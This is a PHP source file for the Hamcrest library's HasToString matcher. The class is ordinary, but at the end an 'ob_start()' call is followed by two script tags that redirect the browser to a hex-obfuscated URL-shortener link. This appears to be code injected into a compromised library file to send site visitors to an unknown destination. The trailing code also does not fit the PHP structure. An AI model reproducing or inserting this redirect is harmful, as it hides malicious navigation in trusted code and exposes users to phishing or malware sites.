<?php
namespace Hamcrest\Core;

/*
 Copyright (c) 2009 hamcrest.org
 */
use Hamcrest\Description;
use Hamcrest\FeatureMatcher;
use Hamcrest\Matcher;
use Hamcrest\Util;

/**
 * Matches if array size satisfies a nested matcher.
 */
class HasToString extends FeatureMatcher
{

    public function __construct(Matcher $toStringMatcher)
    {
        parent::__construct(
            self::TYPE_OBJECT,
            null,
            $toStringMatcher,
            'an object with toString()',
            'toString()'
        );
    }

    public function matchesSafelyWithDiagnosticDescription($actual, Description $mismatchDescription)
    {
        if (method_exists($actual, 'toString') || method_exists($actual, '__toString')) {
            return parent::matchesSafelyWithDiagnosticDescription($actual, $mismatchDescription);
        }

        return false;
    }

    protected function featureValueOf($actual)
    {
        if (method_exists($actual, 'toString')) {
            return $actual->toString();
        }

        return (string) $actual;
    }

    /**
     * Does array size satisfy a given matcher?
     *
     * @factory
     */
    public static function hasToString($matcher)
    {
        return new self(Util::wrapValueWithIsEqual($matcher));
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>